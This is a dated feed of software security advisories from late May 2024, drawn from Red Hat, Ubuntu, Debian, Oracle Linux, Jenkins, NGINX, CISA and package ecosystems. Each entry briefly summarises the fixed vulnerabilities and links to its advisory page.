22.05.2024 03:00:00	redhat	[RHSA-2024:3268] krb5 security update (low)	Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center (KDC).Security Fix(es):* krb5: Memory leak at /krb5/src/lib/rpc/pmap_rmt.c (CVE-2024-26458)* krb5: Memory leak at /krb5/src/lib/gssapi/krb5/k5sealv3.c (CVE-2024-26461)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3268
22.05.2024 03:00:00	redhat	[RHSA-2024:3270] sssd security update (moderate)	The System Security Services Daemon (SSSD) service provides a set of daemons to manage access to remote directories and authentication mechanisms. It also provides the Name Service Switch (NSS) and the Pluggable Authentication Modules (PAM) interfaces toward the system, and a pluggable back-end system to connect to multiple different account sources.Security Fix(es):* sssd: Race condition during authorization leads to GPO policies functioning inconsistently (CVE-2023-3758)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3270
22.05.2024 03:00:00	redhat	[RHSA-2024:3271] bind and dhcp security update (important)	The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. The dhcp packages provide a relay agent and ISC DHCP service required to enable and administer DHCP on a network.Security Fix(es):* bind9: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)Bug Fix:* dhcp rebuilt after API change of bind-export-libsFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3271
23.05.2024 19:27:42	ubuntu	[USN-6785-1] GNOME Remote Desktop vulnerability	GNOME Remote Desktop would allow unintended access to sensitive informationor remote desktop connections.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6785-1
23.05.2024 16:00:48	ubuntu	[USN-6784-1] cJSON vulnerabilities (high)	cJSON could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6784-1
23.05.2024 17:23:33	maven	[MAVEN:GHSA-HJFC-6JXR-J2RX] Eclipse Ditto vulnerable to Cross-site Scripting (moderate)	In Eclipse Ditto starting in version 3.0.0 and prior to versions 3.4.5 and 3.5.6, the user input of several input fields of the Eclipse Ditto Explorer User Interface https://eclipse.dev/ditto/user-interface.html was not properly neutralized and thus vulnerable to both Reflected and Stored XSS (Cross Site Scripting).Several inputs were not persisted at the backend of Eclipse Ditto, but only in local browser storage to save settings of "environments" of the UI and e.g. the last performed "search queries", resulting in a "Reflected XSS" vulnerability.However, several other inputs were persisted at the backend of Eclipse Ditto, leading to a "Stored XSS" vulnerability. Those mean that authenticated and authorized users at Eclipse Ditto can persist Things in Ditto which can - when being displayed by other users also being authorized to see those Things in the Eclipse Ditto UI - cause scripts to be executed in the browser of other users.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HJFC-6JXR-J2RX
23.05.2024 15:02:46	ubuntu	[USN-6777-4] Linux kernel (HWE) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6777-4
23.05.2024 12:28:52	ubuntu	[USN-6736-2] klibc vulnerabilities (critical)	Several security issues were fixed in klibc.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6736-2
23.05.2024 12:27:17	ubuntu	[USN-6663-3] OpenSSL update	Add implicit rejection in PKCS#1 v1.5 in OpenSSL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6663-3
23.05.2024 03:00:00	cisa	[CISA-2024:0523] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0523
23.05.2024 03:00:00	redhat	[RHSA-2024:3304] libreoffice security fix update (important)	LibreOffice is an open source, community-developed office productivitysuite. It includes key desktop applications, such as a word processor, aspreadsheet, a presentation manager, a formula editor, and a drawingprogram. LibreOffice replaces OpenOffice and provides a similar butenhanced and extended office suite.Security Fix(es):* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3304
23.05.2024 03:00:00	redhat	[RHSA-2024:3341] gdk-pixbuf2 security update (moderate)	The gdk-pixbuf2 packages provide an image loading library that can be extendedby loadable modules for new image formats. It is used by toolkits such as GTK+or clutter.Security Fix(es):* gdk-pixbuf2: heap memory corruption on gdk-pixbuf (CVE-2022-48622)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3341
23.05.2024 03:00:00	redhat	[RHSA-2024:3343] xorg-x11-server-Xwayland security update (important)	Xwayland is an X server for running X clients under Wayland.Security Fix(es):* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)* xorg-x11-server: Use-after-free in ProcRenderAddGlyphs (CVE-2024-31083)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3343
23.05.2024 03:00:00	redhat	[RHSA-2024:3307] tomcat security and bug fix update (important)	Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.Security Fix(es):* Apache Tomcat: HTTP/2 header handling DoS (CVE-2024-24549)* Apache Tomcat: WebSocket DoS with incomplete closing handshake (CVE-2024-23672)Bug Fix(es) and Enhancement(s):* Rebase tomcat to version 9.0.87 (JIRA:RHEL-34815)* Amend tomcat's changelog so that fixed CVEs are mentioned explicitly (JIRA:RHEL-35328)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3307
23.05.2024 03:00:00	redhat	[RHSA-2024:3340] .NET 7.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.119 and .NET Runtime 7.0.19.Security Fix(es):* dotnet: stack buffer overrun in Double Parse (CVE-2024-30045)* dotnet: denial of service in ASP.NET Core due to deadlock in Http2OutputProducer.Stop() (CVE-2024-30046)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3340
23.05.2024 03:00:00	redhat	[RHSA-2024:3344] glibc security update (important)	The glibc packages provide the standard C libraries (libc), POSIX threadlibraries (libpthread), standard math libraries (libm), and the name servicecache daemon (nscd) used by multiple programs on the system. Without theselibraries, the Linux system cannot function correctly.Security Fix(es):* glibc: stack-based buffer overflow in netgroup cache (CVE-2024-33599)* glibc: null pointer dereferences after failed netgroup cache insertion(CVE-2024-33600)* glibc: netgroup cache may terminate daemon on memory allocation failure(CVE-2024-33601)* glibc: netgroup cache assumes NSS callback uses in-buffer strings(CVE-2024-33602)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3344
23.05.2024 03:00:00	redhat	[RHSA-2024:3345] .NET 8.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.105 and .NET Runtime 8.0.5.Security Fix(es):* dotnet: stack buffer overrun in Double Parse (CVE-2024-30045)* dotnet: denial of service in ASP.NET Core due to deadlock in Http2OutputProducer.Stop() (CVE-2024-30046)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3345
23.05.2024 03:00:00	redhat	[RHSA-2024:3346] git-lfs security update (important)	Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.Security Fix(es):* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288)* golang: net/http/cookiejar: incorrect forwarding of sensitive headers and cookies on HTTP redirect (CVE-2023-45289)* golang: net/http: memory exhaustion in Request.ParseMultipartForm (CVE-2023-45290)* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3346
23.05.2024 03:00:00	redhat	[RHSA-2024:3347] python3 security update (important)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597)* python: The zipfile module is vulnerable to zip-bombs leading to denial of service (CVE-2024-0450)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3347
23.05.2024 18:02:46	go	[GO-2024-2571] Invalid block proposal in github.com/cosmos/cosmos-sdk		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2571
24.05.2024 23:09:40	maven	[MAVEN:GHSA-HFG7-J82C-FR3W] Soot Infinite Loop vulnerability (high)	An infinite loop in the retrieveActiveBody function of Soot before v4.4.1 under Java 8 allows attackers to cause a Denial of Service (DoS).	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HFG7-J82C-FR3W
24.05.2024 22:47:56	go	[GO-2024-2879] Dapr API Token Exposure in github.com/dapr/dapr (medium)		https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2879
24.05.2024 22:00:29	maven	[MAVEN:GHSA-W8CP-FRXC-55PJ] Kwik does not discard unused encryption keys (moderate)	Kwik commit 745fd4e2 does not discard unused encryption keys.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W8CP-FRXC-55PJ
24.05.2024 21:52:11	maven	[MAVEN:GHSA-CW5R-JX8R-9F7X] Jenkins Report Info Plugin Path Traversal vulnerability (moderate)	Jenkins Report Info Plugin 1.2 and earlier does not perform path validation of the workspace directory while serving report files.Additionally, Report Info Plugin does not support distributed builds.This results in a path traversal vulnerability, allowing attackers with Item/Configure permission to retrieve Surefire failures, PMD violations, Findbugs bugs, and Checkstyle errors on the controller file system by editing the workspace path.As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CW5R-JX8R-9F7X
24.05.2024 17:45:20	npm	[NPM:GHSA-2QJP-FG8C-G878] vxe-table Cross-site Scripting vulnerability (low)	A vulnerability, which was classified as problematic, has been found in xuliangzhan vxe-table up to 3.7.9. This issue affects the function export of the file packages/textarea/src/textarea.js of the component vxe-textarea. The manipulation of the argument inputValue leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 3.7.10 is able to address this issue. The patch is named d70b0e089740b65a22c89c106ebc4627ac48a22d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-266123.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2QJP-FG8C-G878
24.05.2024 17:45:05	npm	[NPM:GHSA-3965-HPX2-Q597] Pug allows JavaScript code execution if an application accepts untrusted input (high)	Pug through 3.0.2 allows JavaScript code execution if an application accepts untrusted input for the name option of the `compileClient`, `compileFileClient`, or `compileClientWithDependenciesTracked` function. NOTE: these functions are for compiling Pug templates into JavaScript, and there would typically be no reason to allow untrusted callers.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3965-HPX2-Q597
24.05.2024 03:00:00	debian	[DSA-5698-1] ruby-rack (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5698-1
24.05.2024 03:00:00	debian	[DSA-5697-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5697-1
24.05.2024 03:00:00	debian	[DSA-5699-1] redmine (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5699-1
24.05.2024 03:00:00	jenkins	[JENKINS:SECURITY-3250] Stored XSS vulnerability in `teamconcert-git` (high)	`teamconcert-git` 2.0.4 and earlier does not escape the Rational Team Concert (RTC) server URI on the build page when showing changes.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.`teamconcert-git` 2.0.5 escapes the Rational Team Concert (RTC) server URI on the build page when showing changes.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3250
24.05.2024 03:00:00	jenkins	[JENKINS:SECURITY-3070] Path traversal vulnerability in `report-info` (medium)	`report-info` 1.2 and earlier does not perform path validation of the workspace directory while serving report files.Additionally, `report-info` does not support distributed builds.This results in a path traversal vulnerability, allowing attackers with Item/Configure permission to retrieve Surefire failures, PMD violations, Findbugs bugs, and Checkstyle errors on the controller file system by editing the workspace path.As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3070
24.05.2024 03:00:00	jenkins	[JENKINS:SECURITY-3278] XXE vulnerabilities in `hp-application-automation-tools-plugin` (high)	`hp-application-automation-tools-plugin` 24.1.0 and earlier does not configure its XML parsers to prevent XML external entity (XXE) attacks.This allows attackers able to control the input files for `hp-application-automation-tools-plugin` build steps and post-build steps to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.`hp-application-automation-tools-plugin` 24.1.1-beta disables external entity resolution for its XML parsers.NOTE: The fix is currently available only as a beta release.Beta releases will not appear in the regular update center but can be found in the experimental update center.For more information on how to install a beta release, see this link:/doc/developer/publishing/releasing-experimental-updates/#using-the-experimental-update-center[documentation].	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3278
24.05.2024 03:00:00	jenkins	[JENKINS:SECURITY-3277] Missing permission checks in `hp-application-automation-tools-plugin` (medium)	`hp-application-automation-tools-plugin` 24.1.0 and earlier does not perform permission checks in several HTTP endpoints.This allows attackers with Overall/Read permission to enumerate ALM jobs configurations, ALM Octane configurations and Service Virtualization configurations.`hp-application-automation-tools-plugin` 24.1.1-beta requires Item/Configure permission to enumerate ALM jobs configurations, ALM Octane configurations and Service Virtualization configurations.NOTE: The fix is currently available only as a beta release.Beta releases will not appear in the regular update center but can be found in the experimental update center.For more information on how to install a beta release, see this link:/doc/developer/publishing/releasing-experimental-updates/#using-the-experimental-update-center[documentation].	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3277
25.05.2024 03:00:00	freebsd	[FREEBSD:04E78F32-04B2-4C23-BFAE-72600842D317] electron29 -- use after free in Dawn	Electron developers report: This update fixes the following vulnerability: Security: backported fix for CVE-2024-4948.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:04E78F32-04B2-4C23-BFAE-72600842D317
25.05.2024 03:00:00	freebsd	[FREEBSD:43D1C381-A3E5-4A1D-B3ED-F37B61A451AF] electron28 -- multiple vulnerabilities	Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-4948. Security: backported fix for CVE-2024-3914. Security: backported fix for CVE-2024-4060. Security: backported fix for CVE-2024-4058. Security: backported fix for CVE-2024-4558.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:43D1C381-A3E5-4A1D-B3ED-F37B61A451AF
27.05.2024 18:33:26	ubuntu	[USN-6673-3] python-cryptography vulnerability (high)	python-cryptography could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6673-3
28.05.2024 22:06:59	ubuntu	[USN-6795-1] Linux kernel (Intel IoTG) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6795-1
28.05.2024 19:08:11	ubuntu	[USN-6792-1] Flask-Security vulnerability (medium)	Flask-Security could be made to bypass URL validation and redirect to arbitary URL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6792-1
28.05.2024 18:47:59	maven	[MAVEN:GHSA-G3HR-P86P-593H] OpenAPI Generator Online - Arbitrary File Read/Delete (high)	### ImpactAttackers can exploit the vulnerability to read and delete files and folders from an arbitrary, writable directory as anyone can set the output folder when submitting the request via the `outputFolder` option.### PatchesThe issue was fixed via https://github.com/OpenAPITools/openapi-generator/pull/18652 (included in v7.6.0 release) by removing the usage of the `outputFolder` option.### WorkaroundsNo workaround available.### ReferencesNo other reference available.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G3HR-P86P-593H
28.05.2024 18:29:21	ubuntu	[USN-6794-1] FRR vulnerabilities	Several security issues were fixed in FRR.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6794-1
28.05.2024 16:39:27	ubuntu	[USN-6793-1] Git vulnerabilities (critical)	Several security issues were fixed in Git.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6793-1
28.05.2024 16:28:29	ubuntu	[USN-6787-1] Jinja2 vulnerability (medium)	Jinja2 could allow cross-site scripting (XSS) attacks.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6787-1
28.05.2024 14:34:52	ubuntu	[USN-6791-1] Unbound vulnerability	Unbound could be made to take part in a denial of service attack.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6791-1
28.05.2024 14:24:30	ubuntu	[USN-6790-1] amavisd-new vulnerability	amavisd-new could be made to bypass security measures.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6790-1
28.05.2024 14:07:12	ubuntu	[USN-6789-1] LibreOffice vulnerability	LibreOffice could be made to run programs when clicking a graphic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6789-1
28.05.2024 13:49:42	ubuntu	[USN-6788-1] WebKitGTK vulnerabilities	Several security issues were fixed in WebKitGTK.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6788-1
28.05.2024 09:01:48	ubuntu	[USN-6786-1] Netatalk vulnerabilities (critical)	Netatalk could allow arbitrary code execution if it receives a speciallycrafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6786-1
28.05.2024 03:00:00	cisa	[CISA-2024:0528] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0528
28.05.2024 13:19:14	almalinux	[ALSA-2024:3339] glibc security update (important)	glibc security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3339
28.05.2024 13:01:45	almalinux	[ALSA-2024:3307] tomcat security and bug fix update (important)	tomcat security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3307
29.05.2024 19:15:10	nginx	[NGINX:CVE-2024-32760] Buffer overwrite in HTTP/3 (medium)	When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed HTTP/3 encoder instructions can cause NGINX worker processes to terminate or cause or other potential impact.	https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-32760
29.05.2024 19:15:10	nginx	[NGINX:CVE-2024-35200] NULL pointer dereference in HTTP/3 (medium)	When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed HTTP/3 requests can cause NGINX worker processes to terminate.	https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-35200
29.05.2024 19:15:10	nginx	[NGINX:CVE-2024-34161] Memory disclosure in HTTP/3 (medium)	When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module and the network infrastructure supports a Maximum Transmission Unit (MTU) of 4096 or greater without fragmentation, undisclosed QUIC packets can cause NGINX worker processes to leak previously freed memory.	https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-34161
29.05.2024 19:15:09	nginx	[NGINX:CVE-2024-31079] Stack overflow and use-after-free in HTTP/3 (medium)	When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed HTTP/3 requests can cause NGINX worker processes to terminate or cause other potential impact. This attack requires that a request be specifically timed during the connection draining process, which the attacker has no visibility and limited influence over.	https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-31079
29.05.2024 18:38:21	ubuntu	[USN-6799-1] Werkzeug vulnerability (high)	Werkzeug could be made to execute code under certain circumstances.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6799-1
29.05.2024 17:58:02	ubuntu	[USN-6798-1] GStreamer Base Plugins vulnerability (high)	GStreamer Base Plugins could be made to crash or run programs as your login if itopened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6798-1
29.05.2024 16:21:53	ubuntu	[USN-6796-1] TPM2 Software Stack vulnerabilities (medium)	Several security issues were fixed in TPM2 Software Stack.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6796-1
29.05.2024 10:13:42	ubuntu	[USN-6797-1] Intel Microcode vulnerabilities (high)	Several security issues were fixed in Intel Microcode.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6797-1
29.05.2024 07:25:29	ubuntu	[USN-6779-2] Firefox regressions	USN-6779-1 caused some minor regressions in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6779-2
29.05.2024 03:00:00	cisa	[CISA-2024:0529] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0529
29.05.2024 03:00:00	debian	[DSA-5700-1] python-pymysql	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5700-1
29.05.2024 03:00:00	oraclelinux	[ELSA-2024-3258] xorg-x11-server security update (moderate)	[1.20.14-23]- CVE fix for: CVE-2024-31080, CVE-2024-31081, CVE-2024-31082 and CVE-2024-31083- Add util-linux as a dependency of Xvfb- Fix compilation error on i686	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3258
29.05.2024 03:00:00	oraclelinux	[ELSA-2024-3268] krb5 security update (low)	[1.18.2-27.0.1]- Fixed race condition in krb5_set_password() [Orabug: 33609767][1.18.2-27]- Fix memory leak in GSSAPI interface Resolves: RHEL-27250- Fix memory leak in PMAP RPC interface Resolves: RHEL-27244- Make TCP waiting time configurable Resolves: RHEL-17131	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3268
29.05.2024 03:00:00	oraclelinux	[ELSA-2024-3270] sssd security update (moderate)	[2.9.4-3.0.1]- Restore default debug level for sss_cache [Orabug: 32810448][2.9.4-3]- Resolves: RHEL-27205 - Race condition during authorization leads to GPO policies functioning inconsistently	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3270
29.05.2024 03:00:00	oraclelinux	[ELSA-2024-3271] bind and dhcp security update (important)	bind[32:9.11.36-14]- Speed up parsing of DNS messages with many different names (CVE-2023-4408)- Prevent increased CPU consumption in DNSSEC validator (CVE-2023-50387 CVE-2023-50868)- Do not use header_prev in expire_lru_headersdhcp[4.3.6]- Change bug tracker path[12:4.3.6-50]- Rebuild because of bind ABI changes related to CVE-2023-50387	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3271
29.05.2024 03:00:00	oraclelinux	[ELSA-2024-3261] tigervnc security update (important)	[1.13.1-10]- Drop patches that are already part of xorg-x11-server Resolves: RHEL-30755 Resolves: RHEL-30767 Resolves: RHEL-30761[1.13.1-9]- Fix CVE-2024-31080 tigervnc: xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents Resolves: RHEL-30755- Fix CVE-2024-31083 tigervnc: xorg-x11-server: User-after-free in ProcRenderAddGlyphs Resolves: RHEL-30767- Fix CVE-2024-31081 tigervnc: xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice Resolves: RHEL-30761[1.13.1-8]- Fix copy/paste error in the DeviceStateNotify Resolves: RHEL-20530[1.13.1-7]- Fix CVE-2024-21886 tigervnc: xorg-x11-server: heap buffer overflow in DisableDevice Resolves: RHEL-20388- Fix CVE-2024-21885 tigervnc: xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent Resolves: RHEL-20382- Fix CVE-2024-0229 tigervnc: xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access Resolves: RHEL-20530- Fix CVE-2023-6816 tigervnc: xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer Resolves: RHEL-21214[1.13.1-6]- Use dup() to get available file descriptor when using -inetd option Resolves: RHEL-21000[1.13.1-5]- Fix CVE-2023-6377 tigervnc: xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions Resolves: RHEL-18410- Fix CVE-2023-6478 tigervnc: xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty Resolves: RHEL-18422[1.13.1-4]- Fix CVE-2023-5380 tigervnc: xorg-x11-server: Use-after-free bug in DestroyWindow Resolves: RHEL-15236- Fix CVE-2023-5367 tigervnc: xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty Resolves: RHEL-15230[1.13.1-3]- Support username alias in PlainUsers Resolves: RHEL-4258	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3261
29.05.2024 03:00:00	oraclelinux	[ELSA-2024-3275] python-dns security update (moderate)	[1.15.0-12]- Security fix for CVE-2023-29483Resolves: RHEL-32630	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3275
29.05.2024 03:00:00	oraclelinux	[ELSA-2024-3340] .NET 7.0 security update (important)	[7.0.119-1.0.1]- Add support for Oracle Linux[7.0.119-1]- Update to .NET SDK 7.0.119 and Runtime 7.0.19- Resolves: RHEL-35313[7.0.118-2]- Update to .NET SDK 7.0.118 and Runtime 7.0.18- Resolves: RHEL-31199	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3340
29.05.2024 03:00:00	oraclelinux	[ELSA-2024-3264] pcp security update (important)	[5.3.7-20.0.1]- pcp-zoneinfo fix to replay ol7 archives [Orabug: 35903733]- Backporting of python tool pcp-meminfo [Orabug: 35759707]- Backporting of python tool pcp-slabinfo [Orabug: 35560940]- Backporting of python tool pcp-buddyinfo [Orabug: 35660932]- Backporting of python tool pcp-netstat [Orabug: 34324779]- Backporting of python tool pcp-zoneinfo [Orabug: 35660927]- Fixed multiple pcp python utiltites issues[Orabug: 35434363]- Fixed broken pipe issue in pcp ps utlity[Orabug: 34830203]- Fixed pcp mpstat utiltiy crash issue [Orabug: 34891338]- Pcp mpstat utiltiy initial archive file read error fix [Orabug: 34869451]- Fix pcp-ps to show n sample with archives[Orabug: 34849959]- Pcp ps Utility -o option and print issue fix [Orabug: 34321683]- Pcp ps utilty has been added [Orabug: 34321683][5.3.7-20]- Disable RESP proxying by default in pmproxy (RHEL-30715)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3264
30.05.2024 22:49:05	maven	[MAVEN:GHSA-VG6X-PCHQ-98MG] OpenCMS Cross-Site Scripting vulnerability (moderate)	Two Cross-Site Scripting vulnerabilities have been discovered in Alkacon's OpenCMS affecting version 16, which could allow a user: with sufficient privileges to create and modify web pages through the admin panel, can execute malicious JavaScript code, after inserting code in the `title` field. Another could having the roles of gallery editor or VFS resource manager will have the permission to upload images in the .svg format containing JavaScript code. The code will be executed the moment another user accesses the image.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VG6X-PCHQ-98MG
30.05.2024 21:34:34	npm	[NPM:GHSA-PMH2-WPJM-FJ45] mysql2 vulnerable to Prototype Pollution (high)	Versions of the package mysql2 before 3.9.8 are vulnerable to Prototype Pollution due to improper user input sanitization passed to fields and tables when using nestTables.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PMH2-WPJM-FJ45
30.05.2024 18:53:23	ubuntu	[USN-6803-1] FFmpeg vulnerabilities	FFmpeg could be made to crash or run programs as your login if itopened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6803-1
30.05.2024 14:59:25	ubuntu	[USN-6802-1] PostgreSQL vulnerability (low)	PostgreSQL could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6802-1
